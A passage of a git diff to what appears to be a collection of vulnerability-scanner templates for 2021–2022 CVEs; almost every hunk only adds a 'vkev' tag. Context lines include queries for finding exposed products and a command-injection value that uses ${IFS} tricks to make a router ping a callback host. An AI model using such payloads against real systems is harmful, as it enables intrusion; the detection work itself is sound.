@@ -25,7 +25,7 @@ info: product: optinmonster framework: wordpress publicwww-query: "/wp-content/plugins/optinmonster" - tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure + tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index f8c6d20ec96..01f79ba35a7 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -28,7 +28,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,ssrf,apache,mod-proxy,kev + tags: cve2021,cve,ssrf,apache,mod-proxy,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 9f6e03a4c10..2e10554f5ea 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -35,7 +35,7 @@ info: google-query: - intitle:"adselfservice plus" - intitle:"manageengine" - tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp + tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-40655.yaml b/http/cves/2021/CVE-2021-40655.yaml index 56cf704af6e..7ac599bad40 100644 --- a/http/cves/2021/CVE-2021-40655.yaml +++ b/http/cves/2021/CVE-2021-40655.yaml @@ -22,7 +22,7 @@ info: product: dir-605l_firmware fofa-query: body="l_tb>DIR-605" max-request: 1 - tags: cve,cve2021,dlink,kev,dir-605,info-leak + tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 40f3df54220..9cd347d96a2 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -36,7 +36,7 @@ info: - app="geoserver" - title="geoserver" google-query: intitle:"geoserver" - tags: cve2021,cve,ssrf,geoserver,osgeo + tags: cve2021,cve,ssrf,geoserver,osgeo,vkev flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 5e23b23f238..ed5dc8f1324 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: auerswald product: comfortel_3600_ip_firmware - tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald + tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 2f41adeb1a4..08fdf320a7c 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"aviatrix cloud controller" fofa-query: title="aviatrix cloud controller" google-query: intitle:"aviatrix cloud controller" - tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload + tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload,vkev variables: string: "CVE-2021-40870" diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 6e5dfdbb41a..84bc328e6ff 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -31,7 +31,7 @@ info: - http.html:"TestRail" - http.html:"testrail" fofa-query: body="testrail" - tags: cve2021,cve,exposure,gurock,testrail + tags: cve2021,cve,exposure,gurock,testrail,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 8b1274ff566..37370c2f663 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -34,7 +34,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,grafana,xss + tags: cve2021,cve,grafana,xss,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index d5d9d938e3f..99ac749fb4b 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: min product: minio_console - tags: cve2021,cve,minio,min + tags: cve2021,cve,minio,min,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index c7b2b87adaf..335e48ae5e1 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -36,7 +36,7 @@ info: - title="metabase" - app="metabase" google-query: "intitle:\"metabase\"" - tags: cve2021,cve,metabase,lfi,kev + tags: cve2021,cve,metabase,lfi,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index bca39e529aa..de88bf90abd 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware - tags: cve2021,cve,ecoa,lfi,disclosure + tags: cve2021,cve,ecoa,lfi,disclosure,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 078ec778425..f229310d6c4 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -35,7 +35,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve,cve2021,xss,microsoft,exchange + tags: cve,cve2021,xss,microsoft,exchange,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index db3479f0f16..745e7e9229b 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sas product: sas\/intrnet - tags: cve2021,cve,sas,lfi + tags: cve2021,cve,sas,lfi,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 41cfc3dbe18..56537b4fe71 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online-shopping-system-advanced_project product: online-shopping-system-advanced - tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project + tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project,vkev http: - method: POST diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index 320071856c6..d5cfa648273 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: tp-link product: tl-wr840n_firmware - tags: cve2021,cve,tplink,rce,router,tp-link + tags: cve2021,cve,tplink,rce,router,tp-link,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index b8ef742a1ab..845a1b6a4dc 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.89146 metadata: max-request: 2 - tags: cve,cve2021,sqli,auth,edb,opensis + tags: cve,cve2021,sqli,auth,edb,opensis,vkev variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index a4f4035a1aa..28f0a1410a2 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -34,7 +34,7 @@ info: - Apache 2.4.49 - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev + tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev,vkev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index aadf6df0ea5..c010146263c 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -32,7 +32,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,gitlab,api,graphql,enum,unauth + tags: cve2021,cve,gitlab,api,graphql,enum,unauth,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index eab2cfb7643..4cc008b3f7c 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: montala product: resourcespace - tags: cve2021,cve,xss,resourcespace,montala + tags: cve2021,cve,xss,resourcespace,montala,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index aff914ae93c..942304d3609 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -31,7 +31,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev + tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev,vkev variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 1d5e842fd19..48a5547c92f 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 zoomeye-query: app="SAP NetWeaver Application Server httpd - tags: cve2021,cve,sap,xss,seclists,packetstorm + tags: cve2021,cve,sap,xss,seclists,packetstorm,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 98b14cc4f6e..098e3aa4b1b 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: visual-tools product: dvr_vx16_firmware - tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools + tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 4aea7b02424..bbbb1ff7f6a 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -31,7 +31,7 @@ info: - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" - tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev + tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 225184ee578..1cf54f10006 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: bqe product: billquick_web_suite - tags: cve2021,cve,sqli,billquick,kev,bqe + tags: cve2021,cve,sqli,billquick,kev,bqe,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-42359.yaml b/http/cves/2021/CVE-2021-42359.yaml index 8125bdd5fa2..6b4fbfe12cd 100644 --- a/http/cves/2021/CVE-2021-42359.yaml +++ b/http/cves/2021/CVE-2021-42359.yaml @@ -25,7 +25,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/shapepress-dsgvo/" publicwww-query: "/wp-content/plugins/shapepress-dsgvo/" - tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive + tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive,vkev flow: http(1) && http(2) && http(3) diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 42c3046090a..ea10f8f323b 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -32,7 +32,7 @@ info: - http.title:'cas - central authentication service' fofa-query: title='cas - central authentication service' google-query: intitle:'cas - central authentication service' - tags: cve2021,cve,apereo,xss,cas + tags: cve2021,cve,apereo,xss,cas,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index f9d55668234..e852beeb8c3 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -34,7 +34,7 @@ info: - title="create a pipeline - go" html:"gocd version" - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" - tags: cve2021,cve,go,lfi,gocd,thoughtworks + tags: cve2021,cve,go,lfi,gocd,thoughtworks,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index ebbba0fe4ee..3d3bd2e3dbd 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: glpi-project product: barcode - tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project + tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 5ad072e3062..781485109e1 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -35,7 +35,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2021,cve,packetstorm,grafana,lfi + tags: cve2021,cve,packetstorm,grafana,lfi,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 9da6d674126..fbc0d7d5e5e 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"manageengine servicedesk plus" fofa-query: title="manageengine servicedesk plus" google-query: intitle:"manageengine servicedesk plus" - tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp + tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index ef590b0d0d6..86be9f96dcc 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve2021,cve,rce,oast,log4j,injection,kev,apache + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index a7b8fcb9323..87d4ad6c343 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -26,7 +26,7 @@ info: product: 3dprint_lite framework: wordpress publicwww-query: "/wp-content/plugins/3dprint-lite/" - tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive + tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive,vkev variables: string: "{{randstr}}" diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index c10f2ba568e..482f470f443 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: rosariosis product: rosariosis - tags: cve,cve2021,sqli,rosariosis + tags: cve,cve2021,sqli,rosariosis,vkev http: - method: POST diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 1d7fbb172f2..692df72e97e 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -31,7 +31,7 @@ info: - title="manageengine desktop central 10" - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" - tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp + tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 9bdfe20fdcc..ba21dec1104 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -32,7 +32,7 @@ info: - http.title:"landesk(r) cloud services appliance" fofa-query: title="landesk(r) cloud services appliance" google-query: intitle:"landesk(r) cloud services appliance" - tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev + tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 70d41022714..364dbe54894 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: log4j - tags: cve2021,cve,rce,oast,log4j,injection,kev,apache + tags: cve2021,cve,rce,oast,log4j,injection,kev,apache,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 902a75d3bef..8b26af532a3 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"thinfinity virtualui" fofa-query: title="thinfinity virtualui" google-query: intitle:"thinfinity virtualui" - tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft + tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-45382.yaml b/http/cves/2021/CVE-2021-45382.yaml index fe115ab1239..661aa963c73 100644 --- a/http/cves/2021/CVE-2021-45382.yaml +++ b/http/cves/2021/CVE-2021-45382.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dir-820l_firmware - tags: cve2021,cve,dlink,kev,rce + tags: cve2021,cve,dlink,kev,rce,vkev variables: string1: "{{to_lower(rand_base(5))}}" string2: "{{to_lower(rand_base(6))}}" diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 311b0f30588..960ef16728f 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -37,7 +37,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve2021,cve,reprise,xss,seclists,reprisesoftware + tags: cve2021,cve,reprise,xss,seclists,reprisesoftware,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 31924cc8627..bd1815ef1e1 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: pascom product: cloud_phone_system - tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system + tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 0d1fe44cdc2..eae4e8996fd 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-850l_firmware - tags: cve,cve2021,redirect,dlink,router + tags: cve,cve2021,redirect,dlink,router,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 8a2b9a7eef5..78f4258f25f 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dap-1620 - tags: cve2021,cve,lfi,router,packetstorm,dlink + tags: cve2021,cve,lfi,router,packetstorm,dlink,vkev http: - method: POST diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 73378baacd1..995f0b47376 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -33,7 +33,7 @@ info: - http.html:"Franklin Fueling Systems" - http.html:"franklin fueling systems" fofa-query: body="franklin fueling systems" - tags: cve2021,cve,packetstorm,franklinfueling,lfi + tags: cve2021,cve,packetstorm,franklinfueling,lfi,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 35f950da187..21ddbf59d1c 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -30,7 +30,7 @@ info: vendor: telesquare product: sdt-cs3b1 shodan-query: html:"SDT-CW3B1" - tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb + tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb,vkev variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 32d3d23bcfb..9d807802a46 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery publicwww-query: "/wp-content/plugins/photo-gallery" - tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index dc7497991c8..6c7c04333c0 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -28,7 +28,7 @@ info: vendor: codemiq product: wordpress_email_template_designer framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq + tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index d57b9bb82ae..246e0b57973 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -27,7 +27,7 @@ info: vendor: ad_inserter_pro_project product: ad_inserter_pro framework: wordpress - tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project,vkev http: - method: POST diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 0b304fe44eb..88a65355f5f 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -30,7 +30,7 @@ info: vendor: xmlsitemapgenerator product: xml_sitemap_generator framework: wordpress - tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-0429.yaml b/http/cves/2022/CVE-2022-0429.yaml index 5041549fc54..09b49867214 100644 --- a/http/cves/2022/CVE-2022-0429.yaml +++ b/http/cves/2022/CVE-2022-0429.yaml @@ -24,7 +24,7 @@ info: vendor: cerber product: wp_cerber_security\,_anti-spam_\&_malware_scan framework: wordpress - tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated + tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated,vkev flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 87d520bbf83..24768e8d61d 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -30,7 +30,7 @@ info: vendor: a3rev product: page_view_count framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index a6049a97653..5c884f103e8 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -30,7 +30,7 @@ info: vendor: stylemixthemes product: masterstudy_lms framework: wordpress - tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes,vkev variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index 5e729f8acef..0fad472f1f4 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -29,7 +29,7 @@ info: vendor: easyappointments product: easyappointments framework: wordpress - tags: cve,cve2022,easyappointments,huntr,wordpress + tags: cve,cve2022,easyappointments,huntr,wordpress,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index fc5f8b3d682..3b0ba9bb538 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -30,7 +30,7 @@ info: shodan-query: - "http.component:\"Atlassian Jira\"" - http.component:"atlassian jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index c1c040ba0b2..f412b3bdae3 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -28,7 +28,7 @@ info: product: formcraft3 framework: wordpress fofa-query: "body=\"formcraft3\" && body=\"wp-\"" - tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc + tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0592.yaml b/http/cves/2022/CVE-2022-0592.yaml index 694af217a62..881252be3dd 100644 --- a/http/cves/2022/CVE-2022-0592.yaml +++ b/http/cves/2022/CVE-2022-0592.yaml @@ -23,7 +23,7 @@ info: product: mapsvg framework: wordpress fofa-query: body="/wp-content/plugins/mapsvg/" - tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli + tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 80ba178b7df..f42d61442dc 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -28,7 +28,7 @@ info: vendor: cozmoslabs product: profile_builder framework: wordpress - tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs + tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 8fe1a24c79c..8e9945e4c85 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -29,7 +29,7 @@ info: vendor: webtoprint product: web_to_print_shop\ google-query: inurl:"/wp-content/plugins/udraw" - tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index 9840162472d..eae56d1f331 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -30,7 +30,7 @@ info: vendor: narnoo_distributor_project product: narnoo_distributor framework: wordpress - tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project + tags: 